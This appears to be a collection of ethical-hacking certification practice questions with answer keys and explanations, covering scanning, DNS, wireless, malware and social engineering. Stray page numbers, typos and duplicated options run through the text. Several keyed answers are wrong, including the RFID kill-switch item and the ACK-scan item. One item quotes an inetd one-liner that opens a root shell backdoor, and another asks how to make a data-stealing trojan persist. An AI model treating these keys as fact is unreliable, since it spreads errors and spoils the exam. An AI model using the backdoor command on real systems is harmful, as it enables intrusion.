124 Gerald, the systems administrator for Hyped Enterprise, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, his discovers numerous remote tools were installed that no one claims to have knowledge of in his department. Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to proxy server in Brazil. Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China. What tool Geralds's attacker used to cover their tracks? 73 A. Tor B. ISA C. IAS D. Cheops

A (Explanation: Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs).)

303 Your boss at ABC.com asks you what are the three stages of Reverse Social Engineering. A. Sabotage, advertising, Assisting B. Sabotage, Advertising, Covering C. Sabotage, Assisting, Billing 182 D. Sabotage, Advertising, Covering

A (Explanation: Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.)

142 Under what conditions does a secondary name server request a zone transfer from a primary name server? 84 A. When a primary SOA is higher that a secondary SOA B. When a secondary SOA is higher that a primary SOA C. When a primary name server has had its service restarted D. When a secondary name server has had its service restarted E. When the TTL falls to zero

A (Explanation: Understanding DNS is critical to meeting the requirements of the CEH. When the serial number that is within the SOA record of the primary server is higher than the Serial number within the SOA record of the secondary DNS server, a zone transfer will take place.)

224 You are the security administrator for a large online auction company based out of Los Angeles. After getting your ENSA CERTIFICATION last year, you have steadily been fortifying your network's security including training OS hardening and network security. One of the last things you just changed for security reasons was to modify all the built-in administrator accounts on the local computers of PCs and in Active Directory. After through testing you found and no services or programs were affected by the name changes. Your company undergoes an outside security audit by a consulting company and they said that even through all the administrator account names were changed, the accounts could still be used by a clever hacker to gain unauthorized access. You argue with the auditors and say that is not possible, so they use a tool and show you how easy it is to utilize the administrator account even though its name was changed. What tool did the auditors use? 134 A. sid2user B. User2sid C. GetAcct D. Fingerprint

A (Explanation: User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a remote machine Sid2user.exe can then be used to retrieve the names of all the user accounts and more.)

354 Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. A. True B. False

A (Explanation: Using HTTP basic authentication will result in your password being sent over the internet as clear text. Don't use this technique unless you understand what the ramifications of this are.)

389 A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database? 233 A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database B. An attacker submits user input that executes an operating system command to compromise a target system C. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access D. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database

A (Explanation: Using the poorly designed input validation to alter or steal data from a database is a SQL injection attack.)

356 Which of the following statements best describes the term Vulnerability? A. A weakness or error that can lead to a compromise B. An agent that has the potential to take advantage of a weakness C. An action or event that might prejudice security D. The loss potential of a threat.

A (Explanation: Vulnerabilities are all weaknesses that can be exploited.)

396 WEP is used on 802.11 networks, what was it designed for? 238 A. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN. B. WEP is designed to provide strong encryption to a wireless local area network (WLAN) with a lever of integrity and privacy adequate for sensible but unclassified information. C. WEP is designed to provide a wireless local area network (WLAN) with a level of availability and privacy comparable to what is usually expected of a wired LAN. D. WEOP is designed to provide a wireless local area network (WLAN) with a level of privacy comparable to what it usually expected of a wired LAN.

A (Explanation: WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004.)

591 WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Search engines like Google, frequently spider web pages for indexing. How will you stop web spiders from crawling certain directories on your website? A. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled B. Place authentication on root directories that will prevent crawling from these spiders 357 C. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index D. Enable SSL on the restricted directories which will block these spiders from crawling

A (Explanation: WWW Robots (also called wanderers or spiders) are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. The method used to exclude robots from a server is to create a file on the server which specifies an access policy for robots. This file must be accessible via HTTP on the local URL "/robots.txt". http://www.robotstxt.org/orig.html#format)

598 Steven is the senior network administrator for Onkton Incorporated, an oil well drilling company in Oklahoma City. Steven and his team of IT technicians are in charge of keeping inventory for the entire company; including computers, software, and oil well equipment. To keep track of everything, Steven has decided to use RFID tags on their entire inventory so they can be scanned with either a wireless scanner or a handheld scanner. These RFID tags hold as much information as possible about the equipment they are attached to. When Steven purchased these tags, he made sure they were as state of the art as possible. One feature he really liked was the ability to disable RFID tags if necessary. This comes in very handy when the company actually sells oil drilling equipment to other companies. All Steven has to do is disable the RFID tag on the sold equipment and it cannot give up any information that was previously stored on it. What technology allows Steven to disable the RFID tags once they are no longer needed? A. Newer RFID tags can be disabled by using Terminator Switches built into the chips B. RFID Kill Switches built into the chips enable Steven to disable them C. The company's RFID tags can be disabled by Steven using Replaceable ROM technology D. The technology used to disable an RFIP chip after it is no longer needed, or possibly stolen, is called RSA Blocking

D (Explanation: http://www.rsa.com/rsalabs/node.asp?id=2060)

242 Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally. He enters the following at the command prompt. $ nc -l -p 1026 -u -v In response, he sees the following message. cell(?(c)????STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION. Windows has found 47 Critical Errors. To fix the errors please do the following: 1. Download Registry Repair from: www.reg-patch.com 2. Install Registry Repair 3. Run Registry Repair 4. Reboot your computer FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION! What would you infer from this alert? A. The machine is redirecting traffic to www.reg-patch.com using adware B. It is a genuine fault of windows registry and the registry needs to be backed up C. An attacker has compromised the machine and backdoored ports 1026 and 1027 D. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities

D 145 (Explanation: The "net send" Messenger service can be used by unauthorized users of your computer, without gaining any kind of privileged access, to cause a pop-up window to appear on your computer. Lately, this feature has been used by unsolicited commercial advertisers to inform many campus users about a "university diploma service"...)

2 Which of the following is an application that requires a host application for replication? A. Micro B. Worm C. Trojan D. Virus

D (Explanation: Computer viruses infect a variety of different subsystems on their hosts. A computer virus is a malware that, when executed, replicates by reproducing it self or infecting other programs by modifying them. Infecting computer programs can include as well, data files, or the boot sector of the hard drive. When this replication succeeds, the affected areas are then said to be "infected". References: https://en.wikipedia.org/wiki/Computer_virus)

315 Which of the following is the greatest threat posed by backups? A. A backup is the source of Malware or illicit information. B. A backup is unavailable during disaster recovery. C. A backup is incomplete because no verification was performed. D. An un-encrypted backup can be misplaced or stolen.

D (Explanation: If the data written on the backup media is properly encrypted, it will be useless for anyone without the key. References: http://resources.infosecinstitute.com/backup-media-encryption/)

757 If an attacker's computer sends an IPID of 31400 to a zombie (Idle Scanning) computer on an open port, what will be the response? A. 31400 B. 31402 C. The zombie will not send a response D. 31401

D ( 31401)

704 In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been disabled and confirmation is required before activation. The attackers then scam to collect not one but two credit card numbers, ATM PIN number and other personal details. Ignorant users usually fall prey to this scam. Which of the following statement is incorrect related to this attack? A. Do not reply to email messages or popup ads asking for personal or financial information B. Do not trust telephone numbers in e-mails or popup ads C. Review credit card and bank account statements regularly D. Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks E. Do not send credit card numbers, and personal or financial information via e-mail

D ( Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks)

753 Blane is a security analyst for a law firm. One of the lawyers needs to send out an email to a client but he wants to know if the email is forwarded on to any other recipients. The client is explicitly asked not to re-send the email since that would be a violation of the lawyer's and client's agreement for this particular case. What can Blane use to accomplish this? A. He can use a split-DNS service to ensure the email is not forwarded on. B. A service such as HTTrack would accomplish this. C. Blane could use MetaGoofil tracking tool. D. Blane can use a service such as ReadNotify tracking tool.

D ( Blane can use a service such as ReadNotify tracking tool.)

711 Fred is the network administrator for his company. Fred is testing an internal switch. From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this? A. Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer. B. He can send an IP packet with the SYN bit and the source address of his computer. C. Fred can send an IP packet with the ACK bit set to zero and the source address of the switch. D. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

D ( Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.)

436 Samuel is high school teenager who lives in Modesto California. Samuel is a straight 'A' student who really likes tinkering around with computers and other types of electronic devices. Samuel just received a new laptop for his birthday and has been configuring it ever since. While tweaking the registry, Samuel notices a pop up at the bottom of his screen stating that his computer was now connected to a wireless network. All of a sudden, he was able to get online and surf the Internet. Samuel did some quick research and was able to gain access to the wireless router he was connecting to and see al of its settings? Being able to hop onto someone else's wireless network so easily fascinated Samuel so he began doing more and more research on wireless technologies and how to exploit them. The next day Samuel's fried said that he could drive around all over town and pick up hundred of wireless networks. This really excited Samuel so they got into his friend's car and drove around the city seeing which networks they could connect to and which ones they could not. What has Samuel and his friend just performed? A. Wardriving B. Warwalking C. Warchalking D. Webdriving

A (Explanation: Wardriving is the act of searching for Wi-Fi wireless networks by a person in a moving vehicle using a Wi-Fi-equipped computer, such as a laptop or a PDA, to detect the networks. It was also known (as of 2002) as "WiLDing" (Wireless Lan Driving, although this term never gained any popularity and is no longer used), originating in the San Francisco Bay Area with the Bay Area Wireless Users Group (BAWUG). It is similar to using a scanner for radio. Topic 18, Linux Hacking 261)

738 Hayden is the network security administrator for her company, a large finance firm based in Miami. Hayden just returned from a security conference in Las Vegas where they talked about all kinds of old and new security threats; many of which she did not know of. Hayden is worried about the current security state of her company's network so she decides to start scanning the network from an external IP address. To see how some of the hosts on her network react, she sends out SYN packets to an IP range. A number of IPs responds with a SYN/ACK response. Before the connection is established she sends RST packets to those hosts to stop the session. She does this to see how her intrusion detection system will log the traffic. What type of scan is Hayden attempting here? A. Hayden is attempting to find live hosts on her company's network by using an XMAS scan B. She is utilizing a SYN scan to find live hosts that are listening on her network C. The type of scan, she is using is called a NULL scan D. Hayden is using a half-open scan to find live hosts on her network

D ( Hayden is using a half-open scan to find live hosts on her network)

727 To see how some of the hosts on your network react, Winston sends out SYN packets to an IP range. A number of IPs respond with a SYN/ACK response. Before the connection is established he sends RST packets to those hosts to stop the session. Winston has done this to see how his intrusion detection system will log the traffic. What type of scan is Winston attempting here? A. Winston is attempting to find live hosts on your company's network by using an XMAS scan. B. He is utilizing a SYN scan to find live hosts that are listening on your network. C. This type of scan he is using is called a NULL scan. D. He is using a half-open scan to find live hosts on your network.

D ( He is using a half-open scan to find live hosts on your network.)

30 The terrorist organizations are increasingly blocking all traffic from North America or from Internet Protocol addresses that point to users who rely on the English Language. Hackers sometimes set a number of criteria for accessing their website. This information is shared among the co-hackers. For example if you are using a machine with the Linux Operating System and the Netscape browser then you will have access to their website in a convert way. When federal investigators using PCs running windows and using Internet Explorer visited the hacker's shared site, the hacker's system immediately mounted a distributed denial-of-service attack against the federal system. Companies today are engaging in tracking competitor's through reverse IP address lookup sites like whois.com, which provide an IP address's domain. When the competitor visits the companies website they are directed to a products page without discount and prices are marked higher for their product. When normal users visit the website they are directed to a page with full-blown product details along with attractive discounts. This is based on IPbased blocking, where certain addresses are barred from accessing a site. What is this masking technique called? A. Website Cloaking B. Website Filtering C. IP Access Blockade D. Mirrored WebSite

A (Explanation: Website Cloaking travels under a variety of alias including Stealth, Stealth scripts, IP delivery, Food Script, and Phantom page technology. It's hot- due to its ability to manipulate those elusive top-ranking results from spider search engines. 19)

519 Study the following exploit code taken from a Linux machine and answer the questions below: echo "ingreslock stream tcp nowait root /bin/sh sh -I" > /tmp/x; /usr/sbin/inetd -s /tmp/x; sleep 10; /bin/ rm -f /tmp/x AAAA...AAA 315 In the above exploit code, the command "/bin/sh sh -I" is given. What is the purpose, and why is 'sh' shown twice? A. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file. B. The length of such a buffer overflow exploit makes it prohibitive for user to enter manually. The second 'sh' automates this function. C. It checks for the presence of a codeword (setting the environment variable) among the environment variables. D. It is a giveaway by the attacker that he is a script kiddy.

A (Explanation: What's going on in the above question is the attacker is trying to write to the unix filed /tm/x (his inetd.conf replacement config) -- he is attempting to add a service called ingresslock (which doesnt exist), which is "apparently" suppose to spawn a shell the given port specified by /etc/services for the service "ingresslock", ingresslock is a non-existant service, and if an attempt were made to respawn inetd, the service would error out on that line. (he would have to add the service to /etc/services to suppress the error). Now the question is asking about /bin/sh sh -i which produces an error that should read "sh: /bin/sh: cannot execute binary file", the -i option places the shell in interactive mode and cannot be used to respawn itself.)

568 If you receive a RST packet while doing an ACK scan, it indicates that the port is open.(True/False). A. True B. False

A (Explanation: When and ACK is sent to an open port, a RST is returned. 344)

57 Which of the following systems would not respond correctly to an nmap XMAS scan? A. Windows 2000 Server running IIS 5 B. Any Solaris version running SAMBA Server C. Any version of IRIX D. RedHat Linux 8.0 running Apache Web Server

A (Explanation: When running a XMAS Scan, if a RST packet is received, the port is considered closed, while no response means it is open|filtered. The big downside is that not all systems follow RFC 793 to the letter. A number of systems send RST responses to the probes regardless of whether the port is open or not. This causes all of the ports to be labeled closed. Major operating systems that do this are Microsoft Windows, many Cisco devices, BSDI, and IBM OS/400.)

308 Usernames, passwords, e-mail addresses, and the location of CGI scripts may be obtained from which of the following information sources? A. Company web site B. Search engines C. EDGAR Database query D. Whois query

A (Explanation: Whois query would not enable us to find the CGI scripts whereas in the actual website, some of them will have scripts written to make the website more user friendly. The EDGAR database would in fact give us a lot of the information requested but not the location of CGI scripts, as would a simple search engine on the Internet if you have the time needed. 185)

505 Which of the following countermeasure can specifically protect against both the MAC Flood and MAC Spoofing attacks? A. Port Security B. Switch Mapping C. Port Reconfiguring D. Multiple Recognition

A (Explanation: With Port Security the switch will keep track of which ports are allowed to send traffic on a port.)

422 Paul has just finished setting up his wireless network. He has enabled numerous security features such as changing the default SSID, enabling WPA encryption and enabling MAC filtering on hi wireless router. Paul notices when he uses his wireless connection, the speed is sometimes 54 Mbps and sometimes it is only 24mbps or less. Paul connects to his wireless router's management utility and notices that a machine with an unfamiliar name is connected through his wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop. 252 What is Paul seeing here? A. MAC Spoofing B. Macof C. ARP Spoofing D. DNS Spoofing

A (Explanation: You can fool MAC filtering by spoofing your MAC address and pretending to have some other computers MAC address. Topic 16, Virus and Worms)

273 Steven is a senior security analyst for a state agency in Tulsa, Oklahoma. His agency is currently undergoing a mandated security audit by an outside consulting firm. The consulting firm is halfway through the audit and is preparing to perform the actual penetration testing against the agency's network. The firm first sets up a sniffer on the agency's wired network to capture a reasonable amount of traffic to analyze later. This takes approximately 2 hours to obtain 10 GB of data. The consulting firm then sets up a sniffer on the agency's wireless network to capture the same amount of traffic. This capture only takes about 30 minutes to get 10 GB of data. Why did capturing of traffic take much less time on the wireless network? A. Because wireless access points act like hubs on a network B. Because all traffic is clear text, even when encrypted C. Because wireless traffic uses only UDP which is easier to sniff D. Because wireless networks can't enable encryption

A (Explanation: You can not have directed radio transfers over a WLAN. Every packet will be broadcasted as far as possible with no concerns about who might hear it.)

596 Reflective DDoS attacks do not send traffic directly at the targeted host. Instead, they usually spoof the originating IP addresses and send the requests at the reflectors. These reflectors (usually routers or high-powered servers with a large amount of network resources at their disposal) then reply to the spoofed targeted traffic by sending loads and loads of data to the final target. How would you detect these reflectors on your network? A. Run floodnet tool to detect these reflectors B. Look for the banner text by running Zobbie Zappers tools C. Run Vulnerability scanner on your network to detect these reflectors D. Scan the network using Nmap for the services used by these reflectors

A (Explanation: http://www.exterminate-it.com/malpedia/remove-floodnet)

185 E-mail scams and mail fraud are regulated by which of the following? A. 18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers B. 18 U.S.C. par. 1029 Fraud and Related activity in connection with Access Devices C. 18 U.S.C. par. 1362 Communication Lines, Stations, or Systems D. 18 U.S.C. par. 2510 Wire and Electronic Communications Interception and Interception of Oral Communication

A (Explanation: http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001030----000- .html 111)

441 Jim's organization has just completed a major Linux roll out and now all of the organization's systems are running the Linux 2.5 kernel. The roll out expenses has posed constraints on purchasing other essential security equipment and software. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ. Which built-in functionality of Linux can achieve this? A. IP Tables B. IP Chains C. IP Sniffer D. IP ICMP

A (Explanation: iptables is a user space application program that allows a system administrator to configure the netfilter tables, chains, and rules (described above). Because iptables requires elevated privileges to operate, it must be executed by user root, otherwise it fails to function. On most Linux systems, iptables is installed as /sbin/iptables. IP Tables performs stateful inspection while the older IP Chains only performs stateless inspection.)

267 Ethernet switches can be adversely affected by rapidly bombarding them with spoofed ARP responses. He port to MAC Address table (CAM Table) overflows on the switch and rather than failing completely, moves into broadcast mode, then the hacker can sniff all of the packets on the network. Which of the following tool achieves this? A. ./macof B. ./sniffof C. ./dnsiff D. ./switchsnarf

A (Explanation: macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing).)

247 You are writing an antivirus bypassing Trojan using C++ code wrapped into chess.c to create an executable file chess.exe. This Trojan when executed on the victim machine, scans the entire system (c:\) for data with the following text "Credit Card" and "password". It then zips all the scanned files and sends an email to a predefined hotmail address. You want to make this Trojan persistent so that it survives computer reboots. Which registry entry will you add a key to make it persistent? A. HKEY_LOCAL_MACHINE\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices B. HKEY_LOCAL_USER\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices C. HKEY_LOCAL_SYSTEM\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices D. HKEY_CURRENT_USER\SOFTWARE\MICROOSFT\Windows\CurrentVersion\RunServices

A 149 (Explanation: HKEY_LOCAL_MACHINE would be the natural place for a registry entry that starts services when the MACHINE is rebooted. Topic 7, Sniffers)

266 Daryl is a network administrator working for Dayton Technologies. Since Daryl's background is in web application development, many of the programs and applications his company uses are web-based. Daryl sets up a simple forms-based logon screen for all the applications he creates so they are secure. The problem Daryl is having is that his users are forgetting their passwords quite often and sometimes he does not have the time to get into his applications and change the passwords for them. Daryl wants a tool or program that can monitor web-based passwords and notify him when a password has been changed so he can use that tool whenever a user calls him and he can give them their password right then. What tool would work best for Daryl's needs? A. Password sniffer B. L0phtcrack C. John the Ripper D. WinHttrack

A 160 Explanation: L0phtCrack is a password auditing and recovery application (now called LC5), originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords. John the Ripper is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customisable cracker. It can be run against various encrypted password formats including several crypt password hash types WinHttrack is a offline browser. A password sniffer would give Daryl the passwords when they are changed as it is a web based authentication over a simple form but still it would be more correct to give the users new passwords instead of keeping a copy of the passwords in clear text.)

418 Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPS mapping software application. What is the recommended and well-known GPS mapping package that would interface with PrismStumbler? Select the best answer. A. GPSDrive B. GPSMap C. WinPcap D. Microsoft Mappoint

A 250 (Explanation: Explanations: GPSDrive is a Linux GPS mapping package. It recommended to be used to send PrismStumbler data to so that it can be mapped. GPSMap is a generic term and not a real software package. WinPcap is a packet capture library for Windows. It is used to capture packets and deliver them to other programs for analysis. As it is for Windows, it isn't going to do what Joe Hacker is wanting to do. Microsoft Mappoint is a Windows application. PrismStumbler is a Linux application. Thus, these two are not going to work well together.)

86 You are concerned that someone running PortSentry could block your scans, and you decide to slow your scans so that no one detects them. Which of the following commands will help you achieve this? A. nmap -sS -PT -PI -O -T1 <ip address> B. nmap -sO -PT -O -C5 <ip address> C. nmap -sF -PT -PI -O <ip address> D. nmap -sF -P0 -O <ip address>

A 51 (Explanation: -T[0-5]: Set timing template (higher is faster))

133 Bob is acknowledged as a hacker of repute and is popular among visitors of "underground" sites. Bob is willing to share his knowledge with those who are willing to learn, and many have expressed their interest in learning from him. However, this knowledge has a risk associated with it, as it can be used for malevolent attacks as well. In this context, what would be the most affective method to bridge the knowledge gap between the "black" hats or crackers and the "white" hats or computer security professionals? (Choose the test answer) A. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards. B. Hire more computer security monitoring personnel to monitor computer systems and networks. C. Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life. D. Train more National Guard and reservist in the art of computer security to help out in times of emergency or crises.

A 79 Explanation: Bridging the gap would consist of educating the white hats and the black hats equally so that their knowledge is relatively the same. Using books, articles, the internet, and professional training seminars is a way of completing this goal.)

288 What is a "Collision attack" in cryptography? A. Collision attacks try to find two inputs producing the same hash. B. Collision attacks try to break the hash into two parts, with the same bytes in each part to get the private key. C. Collision attacks try to get the public key. D. Collision attacks try to break the hash into three parts to get the plaintext valuE.

A (Explanation: A Collision Attack is an attempt to find two input strings of a hash function that produce the same hash result. References: https://learncryptography.com/hash-functions/hash-collision-attack)

261 A regional bank hires your company to perform a security assessment on their network after a recent data breach. The attacker was able to steal financial data from the bank by compromising only a single server. Based on this information, what should be one of your key recommendations to the bank? A. Place a front-end web server in a demilitarized zone that only handles external web traffic B. Require all employees to change their passwords immediately C. Move the financial data to another server on the same IP subnet D. Issue new certificates to the web servers from the root certificate authority

A (Explanation: A DMZ or demilitarized zone (sometimes referred to as a perimeter network) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to a larger and untrusted network, usually the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN); an external network node only has direct access to equipment in the DMZ, rather than any other part of the network. References: https://en.wikipedia.org/wiki/DMZ_(computing) 141)

333 The "gray box testing" methodology enforces what kind of restriction? A. The internal operation of a system is only partly accessible to the tester. B. The internal operation of a system is completely known to the tester. C. Only the external operation of a system is accessible to the tester. D. Only the internal operation of a system is known to the tester.

A (Explanation: A black-box tester is unaware of the internal structure of the application to be tested, while a whitebox tester has access to the internal structure of the application. A gray-box tester partially knows the internal structure, which includes access to the documentation of internal data structures as well as the algorithms useD. References: https://en.wikipedia.org/wiki/Gray_box_testing)

298 Which of the following describes the characteristics of a Boot Sector Virus? A. Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR C. Modifies directory table entries so that directory entries point to the virus code instead of the actual program D. Overwrites the original MBR and only executes the new virus code

A (Explanation: A boot sector virus is a computer virus that infects a storage device's master boot record (MBR). The virus moves the boot sector to another location on the hard drivE. References: https://www.techopedia.com/definition/26655/boot-sector-virus)

352 You work as a Security Analyst for a retail organization. In securing the company's network, you set up a firewall and an IDS. However, hackers are able to attack the network. After investigating, you discover that your IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the IDS giving? A. False Negative B. False Positive C. True Negative D. True Positive

A (Explanation: A false negative error, or in short false negative, is where a test result indicates that a condition failed, while it actually was successful. I.e. erroneously no effect has been assumeD. 202 References: https://en.wikipedia.org/wiki/False_positives_and_false_negatives#False_negative_error)

350 You are the Systems Administrator for a large corporate organization. You need to monitor all network traffic on your local network for suspicious activities and receive notifications when an attack is occurring. Which tool would allow you to accomplish this goal? A. Network-based IDS B. Firewall C. Proxy D. Host-based IDS

A (Explanation: A network-based intrusion detection system (NIDS) is used to monitor and analyze network traffic to protect a system from network-based threats. A NIDS reads all inbound packets and searches for any suspicious patterns. When threats are discovered, based on its severity, the system can take action such as notifying administrators, or barring the source IP address from accessing the network. References: https://www.techopedia.com/definition/12941/network-based-intrusion-detectionsystem- nids)

327 An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of packets sent to a Web server in the network's external DMZ. The packet traffic was captured by the IDS and saved to a PCAP filE. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive? A. Protocol analyzer B. Intrusion Prevention System (IPS) C. Network sniffer D. Vulnerability scanner

A (Explanation: A packet analyzer (also known as a network analyzer, protocol analyzer or packet sniffer—or, for particular types of networks, an Ethernet sniffer or wireless sniffer) is a computer program or piece of computer hardware that can intercept and log traffic that passes over a digital network or part of a network. A packet analyzer can analyze packet traffic saved in a PCAP filE. References: https://en.wikipedia.org/wiki/Packet_analyzer)

311 Which of the following is the structure designed to verify and authenticate the identity of individuals within the enterprise taking part in a data exchange? A. PKI B. single sign on C. biometrics D. SOA

A (Explanation: A public key infrastructure (PKI) is a set of roles, policies, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates[1] and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. References: https://en.wikipedia.org/wiki/Public_key_infrastructure)

312 Which of the following is a design pattern based on distinct pieces of software providing application functionality as services to other applications? A. Service Oriented Architecture B. Object Oriented Architecture C. Lean Coding D. Agile Process

A (Explanation: A service-oriented architecture (SOA) is an architectural pattern in computer software design in which application components provide services to other components via a communications protocol, typically over a network. References: https://en.wikipedia.org/wiki/Service-oriented_architecture)

353 Which of the following types of firewalls ensures that the packets are part of the established session? A. Stateful inspection firewall B. Circuit-level firewall C. Application-level firewall D. Switch-level firewall

A (Explanation: A stateful firewall is a network firewall that tracks the operating state and characteristics of network connections traversing it. The firewall is configured to distinguish legitimate packets for different types of connections. Only packets matching a known active connection (session) are allowed to pass the firewall. References: https://en.wikipedia.org/wiki/Stateful_firewall)

233 It is an entity or event with the potential to adversely impact a system through unauthorized access, destruction, disclosure, denial of service or modification of data. Which of the following terms best matches the definition? A. Threat B. Attack C. Vulnerability D. Risk

A (Explanation: A threat is a any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service. Also, the potential for a threat-source to successfully exploit a particular information system vulnerability. References: https://en.wikipedia.org/wiki/Threat_(computer))

336 To maintain compliance with regulatory requirements, a security audit of the systems on a network must be performed to determine their compliance with security policies. Which one of the following tools would most likely be used in such an audit? A. Vulnerability scanner B. Protocol analyzer C. Port scanner D. Intrusion Detection System

A (Explanation: A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses. They can be run either as part of vulnerability management by those tasked with protecting systems - or by black hat attackers looking to gain unauthorized access. References: https://en.wikipedia.org/wiki/Vulnerability_scanner)

246 Which of the following is the BEST way to defend against network sniffing? A. Using encryption protocols to secure network communications B. Register all machines MAC Address in a Centralized Database C. Restrict Physical Access to Server Rooms hosting Critical Servers D. Use Static IP Address

A (Explanation: A way to protect your network traffic from being sniffed is to use encryption such as Secure Sockets Layer (SSL) or Transport Layer Security (TLS). Encryption doesn't prevent packet sniffers from seeing source and destination information, but it does encrypt the data packet's payload so that all the sniffer sees is encrypted gibberish. References: http://netsecurity.about.com/od/informationresources/a/What-Is-A-Packet-Sniffer.htm)

305 The purpose of a __________ is to deny network access to local area networks and other information assets by unauthorized wireless devices. A. Wireless Intrusion Prevention System B. Wireless Access Point C. Wireless Access Control List D. Wireless Analyzer

A (Explanation: A wireless intrusion prevention system (WIPS) is a network device that monitors the radio spectrum for the presence of unauthorized access points (intrusion detection), and can automatically take countermeasures (intrusion prevention). References: https://en.wikipedia.org/wiki/Wireless_intrusion_prevention_system)

273 During a blackbox pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpedeD. What type of firewall is inspecting outbound traffic? A. Application B. Circuit C. Stateful D. Packet Filtering

A (Explanation: An application firewall is an enhanced firewall that limits access by applications to the operating system (OS) of a computer. Conventional firewalls merely control the flow of data to and from the central processing unit (CPU), examining each packet and determining whether or not to forward it toward a particular destination. An application firewall offers additional protection by controlling the execution of files or the handling of data by specific applications. References: http://searchsoftwarequality.techtarget.com/definition/application-firewall)

262 Port scanning can be used as part of a technical assessment to determine network vulnerabilities. The TCP XMAS scan is used to identify listening ports on the targeted system. If a scanned port is open, what happens? A. The port will ignore the packets. B. The port will send an RST. C. The port will send an ACK. D. The port will send a SYN.

A (Explanation: An attacker uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the all flags sent in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. References: https://capec.mitre.org/data/definitions/303.html)

337 Which of these options is the most secure procedure for storing backup tapes? A. In a climate controlled facility offsite B. On a different floor in the same building C. Inside the data center for faster retrieval in a fireproof safe D. In a cool dry environment

A (Explanation: An effective disaster data recovery strategy should consist of producing backup tapes and housing them in an offsite storage facility. This way the data isn't compromised if a natural disaster affects the business' office. It is highly recommended that the backup tapes be handled properly and stored in a secure, climate controlled facility. This provides peace of mind, and gives the business almost immediate stability after a disaster. References: http://www.entrustrm.com/blog/1132/why-is-offsite-tape-storage-the-best-disasterrecovery- strategy)

